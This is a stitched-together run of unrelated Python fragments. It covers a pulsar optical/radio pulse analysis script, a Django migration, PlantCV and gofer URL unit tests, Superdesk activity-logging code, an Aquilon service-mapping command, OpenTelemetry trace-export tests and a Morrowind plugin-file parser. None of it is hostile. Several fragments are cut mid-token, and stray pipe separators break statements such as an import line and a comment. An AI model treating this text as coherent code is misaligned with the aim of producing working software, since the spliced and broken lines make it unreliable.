giantPulseNumberMask = giantPulseNumberMask[mainPulseMask]
indProfiles = indProfiles[mainPulseMask]
radioIndices = radioIndices[mainPulseMask]
#radioIndexBins=np.array([1369,1371,1373,1375,1378,1381,1385,1389,1395])-.5
#r | adioIndexBinsFine = np.arange(1369 | ,1396)-.5
radioIndexBins = np.arange(143,179,1)-.5
radioIndexBinsFine = np.arange(143,179)-.5
if bUseFineIndexBins == True:#For statistical test, use fine binning, for figure, use coarse
radioIndexBins = radioIndexBinsFine
startRadioIndex = radioIndexBins[0]
endRadioIndex = radioIndexBins[-1]
probDict = probsOfGRP(startPeakIndex=startRadioIndex,endPeakIndex=endRadioIndex)
probPhaseBins = probDict['radioPhaseBins']
probPeakDist = probDict['peakDist']
#a mask for less good data, during bright or dim times
dimMask = np.ones(len(counts))
idx0 = np.searchsorted(idxOffsets,0)
dimMask[counts[:,idx0]==0]=0
lineCounts = np.mean(counts,axis=1)
meanLineCounts = np.mean(lineCounts[lineCounts!=0])
stdLineCounts = np.std(lineCounts[lineCounts!=0])
stdPercentCutoff=0.
upperCutoff = scipy.stats.scoreatpercentile(lineCounts,100.-stdPercentCutoff)
lowerCutoff = scipy.stats.scoreatpercentile(lineCounts,stdPercentCutoff)
dimMask[lineCounts>upperCutoff] = 0
dimMask[lineCounts<lowerCutoff] = 0
dimMask = (dimMask==1)
radioStrength = radioMax
indProfilesMask = np.tile(giantPulseNumberMask,(np.shape(indProfiles)[2],1,1))
indProfilesMask = np.swapaxes(indProfilesMask,0,2)
indProfilesMask = np.swapaxes(indProfilesMask,0,1)
indProfilesMasked = np.ma.array(indProfiles,mask=indProfilesMask)
nIdxOffsets = len(idxOffsets)
#sum over GRP index, to get number of nonzero pulses in each index
# this will be used to scale later
nPulsesPerIdx = np.array(np.sum(giantPulseNumberMask,axis=0),dtype=np.double).reshape((-1,1))
cmap = matplotlib.cm.jet
histStart = 0.
histEnd = 1.
nBins=np.shape(indProfiles)[2]
_,phaseBinEdges = np.histogram(np.array([0]),range=(histStart,histEnd),bins=nBins)
phaseBinEdges+=phaseShift
phaseBinCenters = phaseBinEdges[0:-1]+np.diff(phaseBinEdges)/2.
grpProfile = np.ma.mean(indProfilesMasked.data[:,idx0],axis=0)
peakIdx = np.argmax(grpProfile)
peakBins = range(peakIdx-1,peakIdx+2)
print 'opticalPeakPhaseBins',peakBins
nRadioBins=15
radioStrengthCutoff = .155#0.155
radioCutoffMask = radioStrength >= radioStrengthCutoff
strongMask = np.logical_and(radioCutoffMask,dimMask)
#finalMask = np.logical_and(strongMask,radioPeakMask)
radioPhaseMask = np.logical_and(radioIndices >= 143,radioIndices <= 178)
#radioPhaseMask = np.logical_and(radioIndices >= np.min(radioIndices),radioIndices <= np.max(radioIndices))
finalMask = np.logical_and(strongMask,radioPhaseMask)
print 'GRP above',radioStrengthCutoff,':',np.sum(finalMask),'and in phase range'
#counts color plot
fig = plt.figure()
ax = fig.add_subplot(111)
handleMatshow = ax.matshow(counts[finalMask])
ax.set_aspect(1.0*np.shape(counts[finalMask])[1]/np.shape(counts[finalMask])[0])
fig.colorbar(handleMatshow)
overallCoincidentProfile = np.mean(indProfiles[finalMask,idx0,:],axis=0)
surroundingProfiles = np.ma.mean(indProfilesMasked[finalMask,:],axis=0)
avgProfile = np.ma.mean(surroundingProfiles,axis=0)
minProfileIndex = np.argmin(avgProfile)
#for the sky level take an average over 5 points at the lowest part of the period
skyLevel = np.mean(avgProfile[minProfileIndex-3:minProfileIndex+3])
avgProfileErrors = np.ma.std(surroundingProfiles,axis=0)/np.sqrt(nIdxOffsets)#std over iIdxOffset /sqrt(N) to get error in avgProfile
#add errors in quadrature
skySigma = np.sqrt(np.sum(avgProfileErrors[minProfileIndex-3:minProfileIndex+3]**2.))
#should check error in sky level at some point
print 'sky level',skyLevel,'+/-',skySigma
overallCoincidentProfile-=skyLevel
surroundingProfiles-=skyLevel
avgProfile-=skyLevel
indProfiles-=skyLevel
avgOverallProfile = avgProfile
stdProfile = np.ma.std(surroundingProfiles,axis=0)#std over iIdxOffset
stdProfile = np.sqrt(stdProfile**2+skySigma**2)
avgStdProfile = stdProfile/np.sqrt(nIdxOffsets-1)
giantPeakHeight = np.sum(overallCoincidentProfile[peakBins])
peakHeight = np.sum(avgProfile[peakBins])
peakSigma = np.sqrt(np.sum(stdProfile[peakBins]**2))
overallEnhancement = (giantPeakHeight-peakHeight)/peakHeight
enhancementNSigma = (giantPeakHeight-peakHeight)/peakSigma
enhancementError = peakSigma/peakHeight
overallEnhancementError = enhancementError
print 'peak enhancement of avg above',radioStrengthCutoff,':',overallEnhancement,'+/-',enhancementError,'(',enhancementNSigma,' sigma)'
overallPeakHeight = np.array(peakHeight)
allProfiles = np.array(surroundingProfiles.data)
allProfiles[idx0]=overallCoincidentProfile#add back in since it was masked and zeroed earlier
allPeakHeights = np.sum(allProfiles[:,peakBins],axis=1)
peakPercentDifferenceByIdxOffset = (allPeakHeights-peakHeight)/peakHeight
nSigmaByIdxOffset = (allPeakHeights-peakHeight)/peakSigma
#significance figure
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(idxOffsets,np.abs(nSigmaByIdxOffset),'k')
ax.set_ylabel('Standard Deviations of Peak Height from Average Peak')
ax.set_xlabel('Pulse Offset Relative to GRP (number of periods)')
ax.set_ylim((0,4.5))
np.savez('sigP1.npz',idxOffsets=idxOffsets,nSigmaByIdxOffset=nSigmaByIdxOffset)
giantPeakHeights = np.sum(indProfiles[:,idx0,peakBins][finalMask],axis=1)
peakHeights = np.sum(indProfiles[:,:,peakBins][finalMask],axis=2)
#index peakHeights[iGRP,iIdxOffset]
maskedPeakHeights = np.ma.array(peakHeights,mask=giantPulseNumberMask[finalMask])
avgPeakHeights = np.ma.mean(maskedPeakHeights,axis=1)#average over iIdxOffset i.e. average of surrounding pulses for each iGRP
opticalEnhancementGRP = (giantPeakHeights-avgPeakHeights)/avgPeakHeights
opticalEnhancement = (avgPeakHeights-overallPeakHeight)/overallPeakHeight
radioProfile = np.loadtxt(path+'radio/RadioProfile_LyneDM_TZRCorrect_withGUPPIdelay.txt',skiprows=1,usecols=[3])
nRadioPhaseBins = len(radioProfile)
radioProfilePhaseBins = (1.*np.arange(nRadioPhaseBins)+.5)/nRadioPhaseBins
radioProfilePhaseBins+=phaseShift
fig = plt.figure()
ax = fig.add_subplot(111)
ax2 = ax.twinx()
pltHandle2 = ax2.plot(radioProfilePhaseBins,radioProfile,c=(.4,.5,.8),label='Radio Pulse')
pltHandle0 = ax.errorbar(phaseBinCenters,overallCoincidentProfile,yerr=stdProfile,c='k',label='Optical GRP-coincident Pulse')
pltHandle1 = ax.plot(phaseBinCenters,avgProfile,c='r',label='Optical non-GRP-coincident Pulse')
pltHandles = [pltHandle0,pltHandle1[0],pltHandle2[0]]
pltLabels = [pltHandle.get_label() for pltHandle in pltHandles]
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.15,
box.width, box.height * 0.85])
ax2.set_position([box.x0, box.y0 + box.height * 0.15,
box.width, box.height * 0.85])
ax.set_ylim((0.055,.081))
ax2.set_ylim((.11,.155))
ax.set_xlim((0.97,1.005))
locator = matplotlib.ticker.MultipleLocator(.01)
ax2.yaxis.set_major_locator(locator)
ax.legend(pltHandles,pltLabels,loc='upper center', bbox_to_anchor=(0.5, -0.1),
fancybox=True, shadow=True, ncol=2)
ax.set_ylabel('Optical Counts per Period per Pixel')
ax.set_xlabel('Phase')
ax2.set_ylabel('Normalized Radio Intensity')
#enhanced profile figure
#fig = plt.figure(figsize=(1.8,2))
ax |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import m | odels, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Create the RecentActivity model (follower/support events per user)."""
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('main', '0019_auto_20170521_1332'),
    ]
    operations = [
        migrations.CreateModel(
            name='RecentActivity',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('timestamp', models.DateTimeField()),
                ('type', models.CharField(max_length=255, choices=[(b'follow', b'Followers/Subscribers'), (b'support', b'Recurring Support')])),
                # Free-form payload; serialized by the application layer.
                ('data', models.TextField()),
                ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
import | pytest
import cv2
from plantcv.plantcv.visualize import auto_threshold_methods
def test_auto_threshold_methods_bad_input(visualize_test_data):
    """auto_threshold_methods must raise RuntimeError on non-grayscale (RGB) input."""
    img = cv2.imread(visualize_test_data.small_rgb_img)
    with pytest.raises(RuntimeError):
        _ = auto_threshold_methods(gray_img=img)
def test_auto_threshold_methods(visualize_test_data):
    """auto_threshold_methods returns one labeled image per supported method (5)."""
    # -1 = IMREAD_UNCHANGED, keeps the image single-channel grayscale.
    img = cv2.imread(visualize_test_data.small_gray_img, -1)
    labeled_imgs = auto_threshold_methods(gray_img=img)
    assert len(labeled_imgs) == 5
|
# Copyright (c) 2014 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public
# License as published by the Free Software Foundation; either version
# 2 of the License (GPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should
# have received a copy of GPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
from unittest import TestCase
from gofer.messaging.adapter.url import URL
from gofer.messaging.adapter.url import PORT, Scheme
class Test(object):
    """One URL-parsing expectation: a url string plus its expected parts.

    Calling the instance with a TestCase parses the url and asserts each
    component matches.
    """

    def __init__(self,
                 url,
                 adapter=None,
                 scheme=None,
                 host=None,
                 port=None,
                 userid=None,
                 password=None,
                 path=None):
        self.url = url
        self.adapter = adapter
        self.scheme = scheme
        self.host = host
        self.port = port
        self.userid = userid
        self.password = password
        self.path = path

    def __call__(self, test):
        parsed = URL(self.url)
        # Compare each parsed component against the expectation, in the
        # same order as the original explicit assertions.
        for attr in ('adapter', 'scheme', 'host', 'port',
                     'userid', 'password', 'path'):
            test.assertEqual(getattr(parsed, attr), getattr(self, attr))
# URL-parsing fixtures: each entry pairs a raw url string with its expected
# components; omitted fields default to None (or the scheme's default port).
TESTS = [
    Test('qpid+amqp://elmer:fudd@blue:5000/all',
         adapter='qpid',
         scheme='amqp',
         host='blue',
         port=5000,
         userid='elmer',
         password='fudd',
         path='all'),
    Test('amqp://elmer:fudd@yellow:1234//',
         scheme='amqp',
         host='yellow',
         port=1234,
         userid='elmer',
         password='fudd',
         path='/'),
    Test('amqp://green:5678/all/good',
         scheme='amqp',
         host='green',
         port=5678,
         path='all/good'),
    Test('amqp://red:2323',
         scheme='amqp',
         host='red',
         port=2323),
    Test('amqp://black',
         scheme='amqp',
         host='black',
         port=5672),
    Test('amqps://purple',
         scheme='amqps',
         host='purple',
         port=5671),
    Test('orange:6545',
         scheme='amqp',
         host='orange',
         port=6545),
    Test('localhost',
         scheme='amqp',
         host='localhost',
         port=5672),
    Test('',
         scheme='amqp',
         port=5672),
]
class TestURL(TestCase):
    """Unit tests for URL parsing, canonicalisation, ssl detection, hashing."""
    def test_parsing(self):
        """Run every fixture in TESTS against the parser."""
        for test in TESTS:
            test(self)
    def test_canonical(self):
        """Canonical form drops the adapter prefix and the path suffix."""
        urls = [
            'qpid+amqp://elmer:fudd@test-host:5000/all',
            'amqp://elmer:fudd@test-host:5000/all',
            'amqp://test-host:5000/all',
            'amqp://test-host:5000'
        ]
        for _url in urls:
            url = URL(_url)
            # expected: strip 'qpid+' (if any) and the trailing '/all' path
            self.assertEqual(url.canonical, _url.split('+')[-1].rsplit('/all')[0])
    def test_is_ssl(self):
        # false
        url = URL('amqp://localhost')
        self.assertFalse(url.is_ssl())
        # true
        url = URL('amqps://localhost')
        self.assertTrue(url.is_ssl())
    def test_hash(self):
        """URL hashes by its canonical string."""
        url = URL('test')
        self.assertEqual(hash(url), hash(url.canonical))
    def test_str(self):
        """str() of a URL is its canonical form."""
        urls = [
            'qpid+amqp://elmer:fudd@test-host:5000/all',
            'amqp://elmer:fudd@test-host:5000/all',
            'amqp://test-host:5000/all',
            'amqp://test-host:5000',
            'amqp://test-host',
        ]
        for _url in urls:
            url = URL(_url)
            self.assertEqual(str(url), url.canonical)
class TestScheme(TestCase):
    """Unit tests for Scheme.validated()."""

    def test_validated(self):
        # Every scheme with a known default port validates to lowercase.
        for supported in PORT:
            self.assertEqual(Scheme.validated(supported), supported.lower())
        # Anything outside the PORT table is rejected.
        self.assertRaises(ValueError, Scheme.validated, 'unsupported')
|
lf, resource, docs):
if resource in AuditResource.exclude:
return
user = getattr(g, 'user', None)
if not user:
return
if not len(docs):
return
audit = {
'user': user.get('_id'),
'resource': resource,
'action': 'created',
'extra': docs[0]
}
self.post([audit])
def on_generic_updated(self, resource, doc, original):
if resource in AuditResource.exclude:
return
user = getattr(g, 'user', None)
if not user:
return
audit = {
'user': user.get('_id'),
'resource': resource,
'action': 'updated',
'extra': doc
}
self.post([audit])
def on_generic_deleted(self, resource, doc):
if resource in AuditResource.exclude:
return
user = getattr(g, 'user', None)
if not user:
return
audit = {
'user': user.get('_id'),
'resource': resource,
'action': 'deleted',
'extra': doc
}
self.post([audit])
class ActivityResource(Resource):
    """Activity/notification feed: read-only list, PATCH only to mark read."""
    endpoint_name = 'activity'
    resource_methods = ['GET']
    item_methods = ['GET', 'PATCH']
    schema = {
        'name': {'type': 'string'},
        'message': {'type': 'string'},
        'data': {'type': 'dict'},
        # Per-user/per-desk delivery records with a read flag.
        'recipients': {
            'type': 'list',
            'schema': {
                'type': 'dict',
                'schema': {
                    'user_id': Resource.rel('users'),
                    'read': {'type': 'boolean', 'default': False},
                    'desk_id': Resource.rel('desks')
                }
            }
        },
        'item': Resource.rel('archive', type='string'),
        'user': Resource.rel('users'),
        'desk': Resource.rel('desks'),
        'resource': {'type': 'string'}
    }
    # Resources whose changes are never audited.
    exclude = {endpoint_name, 'notification'}
    datasource = {
        'default_sort': [('_created', -1)],
        # Only surface activity from the last 24 hours.
        'filter': {'_created': {'$gte': utcnow() - datetime.timedelta(days=1)}}
    }
# Default (opt-out) user preference for receiving notifications by e-mail.
superdesk.register_default_user_preference('email:notification', {
    'type': 'bool',
    'enabled': True,
    'default': True,
    'label': 'Send notifications via email',
    'category': 'notifications',
})
class ActivityService(BaseService):
    """Service enforcing that a PATCH may only mark one's own notification read."""
    def on_update(self, updates, original):
        """ Called on the patch request to mark a activity/notification/comment as having been read and
        nothing else
        :param updates: fields being patched (must be recipients + _updated only)
        :param original: stored document prior to the patch
        :return:
        """
        user = getattr(g, 'user', None)
        if not user:
            raise SuperdeskApiError.notFoundError('Can not determine user')
        user_id = user.get('_id')
        # make sure that the user making the read notification is in the notification list
        if not self.is_recipient(updates, user_id):
            raise SuperdeskApiError.forbiddenError('User is not in the notification list')
        # make sure the transition is from not read to read
        if not self.is_read(updates, user_id) and self.is_read(original, user_id):
            raise SuperdeskApiError.forbiddenError('Can not set notification as read')
        # make sure that no other users are being marked as read
        for recipient in updates.get('recipients', []):
            if recipient['user_id'] != user_id:
                if self.is_read(updates, recipient['user_id']) != self.is_read(original, recipient['user_id']):
                    raise SuperdeskApiError.forbiddenError('Can not set other users notification as read')
        # make sure that no other fields are being up dated just read and _updated
        if len(updates) != 2:
            raise SuperdeskApiError.forbiddenError('Can not update')
    def is_recipient(self, activity, user_id):
        """
        Checks if the given user is in the list of recipients
        """
        return any(r for r in activity.get('recipients', []) if r['user_id'] == user_id)
    def is_read(self, activity, user_id):
        """
        Returns the read value for the given user
        """
        return next((r['read'] for r in activity.get('recipients', []) if r['user_id'] == user_id), False)
# Activity type identifiers stored in the 'name' field of activity documents.
ACTIVITY_CREATE = 'create'
ACTIVITY_UPDATE = 'update'
ACTIVITY_DELETE = 'delete'
ACTIVITY_EVENT = 'event'
ACTIVITY_ERROR = 'error'
def add_activity(activity_name, msg, resource=None, item=None, notify=None, notify_desks=None,
                 can_push_notification=True, **data):
    """
    Adds an activity into activity log.
    This will became part of current user activity log.
    If there is someone set to be notified it will make it into his notifications box.
    :param activity_name: Name of the activity
    :type activity_name: str
    :param msg: Message to be recorded in the activity log
    :type msg: str
    :param resource: resource name generating this activity
    :type resource: str
    :param item: article instance, if the activity is being recorded against an article, default None
    :type item: dict
    :param notify: user identifiers against whom the activity should be recorded, default None
    :type notify: list
    :param notify_desks: desk identifiers if someone mentions Desk Name in comments widget, default None
    :type notify_desks: list
    :param can_push_notification: flag indicating if a notification should be pushed via WebSocket, default True
    :type can_push_notification: bool
    :param data: kwargs
    :type data: dict
    :return: activity object
    :rtype: dict
    """
    activity = {
        'name': activity_name,
        'message': msg,
        'data': data,
        'resource': resource
    }
    # default WebSocket event name; switched to the activity name below when
    # there are explicit recipients
    name = ActivityResource.endpoint_name
    user = getattr(g, 'user', None)
    if user:
        activity['user'] = user.get('_id')
    activity['recipients'] = []
    if notify:
        activity['recipients'] = [{'user_id': ObjectId(_id), 'read': False} for _id in notify]
        name = activity_name
    if notify_desks:
        activity['recipients'].extend([{'desk_id': ObjectId(_id), 'read': False} for _id in notify_desks])
        name = activity_name
    if item:
        # prefer the stable guid over the database id
        activity['item'] = str(item.get('guid', item.get('_id')))
        if item.get('task') and item['task'].get('desk'):
            activity['desk'] = ObjectId(item['task']['desk'])
    get_resource_service(ActivityResource.endpoint_name).post([activity])
    if can_push_notification:
        push_notification(name, _dest=activity['recipients'])
    return activity
def notify_and_add_activity(activity_name, msg, resource=None, item=None, user_list=None, **data):
    """
    Adds the activity and notify enabled and active users via email.
    """
    add_activity(activity_name, msg=msg, resource=resource, item=item,
                 notify=[str(user.get("_id")) for user in user_list] if user_list else None, **data)
    # emails go out for errors always, otherwise only when there is someone
    # to notify
    if activity_name == ACTIVITY_ERROR or user_list:
        recipients = get_recipients(user_list, activity_name)
        if activity_name != ACTIVITY_ERROR:
            current_user = getattr(g, 'user', None)
            # prefix the message with the acting user's display name when known
            activity = {
                'name': activity_name,
                'message': current_user.get('display_name') + ' ' + msg if current_user else msg,
                'data': data,
                'resource': resource
            }
        else:
            activity = {
                'name': activity_name,
                'message': 'System ' + msg,
                'data': data,
                'resource': resource
            }
        if recipients:
            send_activity_emails(activity=activity, recipients=recipients)
def get_recipients(user_list, activity_name):
if not user_list and activity_name == ACTIVITY_ERROR:
user_list = get_resource_service('users').get_users_by_user_type('administrator')
recipients = [user.get('email') for user in user_list if not user.get('needs_activation', True) and
user.get('is_enabled', False) and user.get('is_active', False) and
|
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016,2017 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the logic for `aq map service`."""
from aquilon.worker.broker import BrokerCommand
from aquilon.aqdb.model import (Personality, HostEnvironment, ServiceMap,
ServiceInstance, NetworkEnvironment)
from aquilon.aqdb.model.host_environment import Production
from aquilon.worker.dbwrappers.change_management import (validate_prod_personality,
enforce_justification)
from aquilon.worker.dbwrappers.location import get_location
from aquilon.worker.dbwrappers.network import get_network_byip
class CommandMapService(BrokerCommand):
    """Logic for `aq map service`: bind a service instance to a location,
    network, personality and/or host environment scope."""

    required_parameters = ["service", "instance"]

    def doit(self, session, dbmap, dbinstance, dblocation, dbnetwork, dbpersona,
             dbenv):
        # Create the mapping only when an identical one does not already exist.
        if not dbmap:
            dbmap = ServiceMap(service_instance=dbinstance, location=dblocation,
                               network=dbnetwork, personality=dbpersona,
                               host_environment=dbenv)
            session.add(dbmap)

    def render(self, session, logger, service, instance, archetype, personality,
               host_environment, networkip, justification, reason, user,
               **kwargs):
        """Resolve command arguments into DB objects, enforce change-management
        rules, then create the service map entry if it is new."""
        dbinstance = ServiceInstance.get_unique(session, service=service,
                                                name=instance, compel=True)
        dblocation = get_location(session, **kwargs)
        if networkip:
            dbnet_env = NetworkEnvironment.get_unique_or_default(session)
            dbnetwork = get_network_byip(session, networkip, dbnet_env)
        else:
            dbnetwork = None
        dbpersona = None
        dbenv = None
        if personality:
            dbpersona = Personality.get_unique(session, name=personality,
                                               archetype=archetype, compel=True)
            # personality-scoped mapping: every stage of the personality must
            # pass production validation
            for dbstage in dbpersona.stages.values():
                validate_prod_personality(dbstage, user, justification, reason, logger)
        elif host_environment:
            dbenv = HostEnvironment.get_instance(session, host_environment)
            # only production-environment mappings require justification
            if isinstance(dbenv, Production):
                enforce_justification(user, justification, reason, logger)
        else:
            # no personality/environment scope given: always require
            # justification
            enforce_justification(user, justification, reason, logger)
        q = session.query(ServiceMap)
        q = q.filter_by(service_instance=dbinstance,
                        location=dblocation, network=dbnetwork,
                        personality=dbpersona,
                        host_environment=dbenv)
        dbmap = q.first()
        self.doit(session, dbmap, dbinstance, dblocation, dbnetwork, dbpersona,
                  dbenv)
        session.flush()
        return
|
_attributes(self):
self.assertEqual(
_extract_attributes({}, num_attrs_limit=4),
ProtoSpan.Attributes(attribute_map={}),
)
def test_extract_variety_of_attributes(self):
    # The mixed-type fixture should map 1:1 onto the pre-built expected proto.
    self.assertEqual(
        _extract_attributes(
            self.attributes_variety_pack, num_attrs_limit=4
        ),
        self.extracted_attributes_variety_pack,
    )
def test_extract_label_mapping_attributes(self):
    # OpenTelemetry http.* attribute keys must be renamed to their Cloud
    # Trace /http/* equivalents during extraction.
    attributes_labels_mapping = {
        "http.scheme": "http",
        "http.host": "172.19.0.4:8000",
        "http.method": "POST",
        "http.request_content_length": 321,
        "http.response_content_length": 123,
        "http.route": "/fuzzy/search",
        "http.status_code": 200,
        "http.url": "http://172.19.0.4:8000/fuzzy/search",
        "http.user_agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
    }
    extracted_attributes_labels_mapping = ProtoSpan.Attributes(
        attribute_map={
            "/http/client_protocol": AttributeValue(
                string_value=TruncatableString(
                    value="http", truncated_byte_count=0
                )
            ),
            "/http/host": AttributeValue(
                string_value=TruncatableString(
                    value="172.19.0.4:8000", truncated_byte_count=0
                )
            ),
            "/http/method": AttributeValue(
                string_value=TruncatableString(
                    value="POST", truncated_byte_count=0
                )
            ),
            "/http/request/size": AttributeValue(int_value=321),
            "/http/response/size": AttributeValue(int_value=123),
            "/http/route": AttributeValue(
                string_value=TruncatableString(
                    value="/fuzzy/search", truncated_byte_count=0
                )
            ),
            "/http/status_code": AttributeValue(int_value=200),
            "/http/url": AttributeValue(
                string_value=TruncatableString(
                    value="http://172.19.0.4:8000/fuzzy/search",
                    truncated_byte_count=0,
                )
            ),
            "/http/user_agent": AttributeValue(
                string_value=TruncatableString(
                    value="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
                    truncated_byte_count=0,
                )
            ),
        }
    )
    self.assertEqual(
        _extract_attributes(attributes_labels_mapping, num_attrs_limit=9),
        extracted_attributes_labels_mapping,
    )
def test_ignore_invalid_attributes(self):
    # Unserializable attribute values are dropped and counted, not raised on.
    self.assertEqual(
        _extract_attributes(
            {"illegal_attribute_value": {}, "legal_attribute": 3},
            num_attrs_limit=4,
        ),
        ProtoSpan.Attributes(
            attribute_map={"legal_attribute": AttributeValue(int_value=3)},
            dropped_attributes_count=1,
        ),
    )
def test_too_many_attributes(self):
    # Attributes beyond num_attrs_limit are dropped and reported in the count.
    too_many_attrs = {}
    for attr_key in range(5):
        too_many_attrs[str(attr_key)] = 0
    proto_attrs = _extract_attributes(too_many_attrs, num_attrs_limit=4)
    self.assertEqual(proto_attrs.dropped_attributes_count, 1)
def test_add_agent_attribute(self):
    # add_agent_attr=True injects the g.co/agent attribute even for empty input.
    self.assertEqual(
        _extract_attributes({}, num_attrs_limit=4, add_agent_attr=True),
        ProtoSpan.Attributes(
            attribute_map={"g.co/agent": self.agent_code},
            dropped_attributes_count=0,
        ),
    )
def test_agent_attribute_priority(self):
    # Drop existing attributes in favor of the agent attribute
    self.assertEqual(
        _extract_attributes(
            {"attribute_key": "attr_value"},
            num_attrs_limit=1,
            add_agent_attr=True,
        ),
        ProtoSpan.Attributes(
            attribute_map={"g.co/agent": self.agent_code},
            dropped_attributes_count=1,
        ),
    )
def test_attribute_value_truncation(self):
    # Values are truncated to 16kB with the dropped byte count recorded.
    # shouldn't truncate
    self.assertEqual(
        _format_attribute_value(self.str_300),
        AttributeValue(
            string_value=TruncatableString(
                value=self.str_300,
                truncated_byte_count=0,
            )
        ),
    )
    # huge string should truncate
    self.assertEqual(
        _format_attribute_value(self.str_20kb),
        AttributeValue(
            string_value=TruncatableString(
                value=self.str_16kb,
                truncated_byte_count=(20 - 16) * 1024,
            )
        ),
    )
def test_list_attribute_value(self):
    # Sequences (tuples/lists of str, bool, int, float) are flattened into a
    # single comma-joined string value.
    self.assertEqual(
        _format_attribute_value(("one", "two")),
        AttributeValue(
            string_value=TruncatableString(
                value="one,two", truncated_byte_count=0
            )
        ),
    )
    self.assertEqual(
        _format_attribute_value([True]),
        AttributeValue(
            string_value=TruncatableString(
                value="True", truncated_byte_count=0
            )
        ),
    )
    self.assertEqual(
        _format_attribute_value((2, 5)),
        AttributeValue(
            string_value=TruncatableString(
                value="2,5", truncated_byte_count=0
            )
        ),
    )
    self.assertEqual(
        _format_attribute_value([2.0, 0.5, 4.55]),
        AttributeValue(
            string_value=TruncatableString(
                value="2.0,0.5,4.55", truncated_byte_count=0
            )
        ),
    )
def test_attribute_key_truncation(self):
    # Attribute keys are truncated to 128 characters; values stay intact.
    self.assertEqual(
        _extract_attributes(
            {self.str_300: "attr_value"}, num_attrs_limit=4
        ),
        ProtoSpan.Attributes(
            attribute_map={
                self.str_128: AttributeValue(
                    string_value=TruncatableString(
                        value="attr_value", truncated_byte_count=0
                    )
                )
            }
        ),
    )
def test_extract_empty_events(self):
    # An empty event list yields None rather than an empty TimeEvents proto.
    self.assertIsNone(_extract_events([]))
def test_too_many_events(self):
    # Events beyond MAX_NUM_EVENTS are dropped and counted as dropped
    # annotations.
    event = Event(
        name="event", timestamp=self.example_time_in_ns, attributes={}
    )
    too_many_events = [event] * (MAX_NUM_EVENTS + 5)
    self.assertEqual(
        _extract_events(too_many_events),
        ProtoSpan.TimeEvents(
            time_event=[
                {
                    "time": self.example_time_stamp,
                    "annotation": {
                        "description": TruncatableString(
                            value="event",
                        ),
                        "attributes": {},
                    },
                },
            ]
            * MAX_NUM_EVENTS,
            dropped_annotations_count=len(too_many_events)
            - MAX_NUM_EVENTS,
        ),
    )
def test_too_many_event_attributes(self):
event_attrs = {}
for attr_key in range(MAX_EVENT_ATTRS + 5):
event_attrs[str(attr_key)] = 0
proto_events = _extract_events(
[
Event(
name="a",
attributes=event_attrs,
timestamp=self.example_time_in_ns,
)
]
)
self.assertEqual(
len(
proto_events.time_event[0].annotation.attributes.attribute_map
|
ata'])
levrec['chancenone'] = parseNum(sr[2]['data'])
levrec['file'] = os.path.basename(rec['fullpath'])
# Apparently, you can have LEV records that end before
# the INDX subrecord. Found those in Tamriel_Data.esm
if len(sr) > 3:
listcount = parseNum(sr[3]['data'])
listitems = []
for i in range(0,listcount*2,2):
itemid = parseString(sr[4+i]['data'])
itemlvl = parseNum(sr[5+i]['data'])
listitems.append((itemlvl, itemid))
levrec['items'] = listitems
else:
levrec['items'] = []
return levrec
def parseTES3(rec):
    """Parse a TES3 (file header) record into a dict.

    The first subrecord (HEDR) has a fixed layout: 4-byte version float,
    4-byte file type, 32-byte author, 256-byte description, 4-byte record
    count.  The remaining subrecords come in (MAST, DATA) pairs naming each
    master file and its size.
    """
    tesrec = {}
    sr = rec['subrecords']
    tesrec['version'] = parseFloat(sr[0]['data'][0:4])
    tesrec['filetype'] = parseNum(sr[0]['data'][4:8])
    tesrec['author'] = parseString(sr[0]['data'][8:40])
    tesrec['desc'] = parseString(sr[0]['data'][40:296])
    tesrec['numrecords'] = parseNum(sr[0]['data'][296:300])
    masters = []
    # alternating master-name / master-size subrecords
    for i in range(1, len(sr), 2):
        mastfile = parseString(sr[i]['data'])
        mastsize = parseNum(sr[i+1]['data'])
        masters.append((mastfile, mastsize))
    tesrec['masters'] = masters
    return tesrec
def pullSubs(rec, subtype):
    """Return every subrecord of *rec* whose type tag equals *subtype*."""
    matches = []
    for sub in rec['subrecords']:
        if sub['type'] == subtype:
            matches.append(sub)
    return matches
def readHeader(ba):
    """Decode a record header: 4-byte ASCII type tag, then a little-endian
    32-bit payload length."""
    type_tag = ba[0:4].decode()
    length = int.from_bytes(ba[4:8], 'little')
    return {'type': type_tag, 'length': length}
def readSubRecord(ba):
    """Split one subrecord off the front of *ba*.

    Layout: 4-byte type tag, little-endian 32-bit length, then that many
    data bytes.  Returns (subrecord dict, remaining bytes).
    """
    length = int.from_bytes(ba[4:8], 'little')
    end = 8 + length
    sub = {
        'type': ba[0:4].decode(),
        'length': length,
        'data': ba[8:end],
    }
    return (sub, ba[end:])
def readRecords(filename):
    """Yield every record in a TES3-format plugin file.

    Each yielded dict carries 'type', 'length', 'fullpath' and the parsed
    list of 'subrecords'.

    Fix: the original opened the file and never closed it; the handle now
    lives in a with-block so it is released when the generator finishes or
    is garbage-collected.
    """
    with open(filename, 'rb') as fh:
        while True:
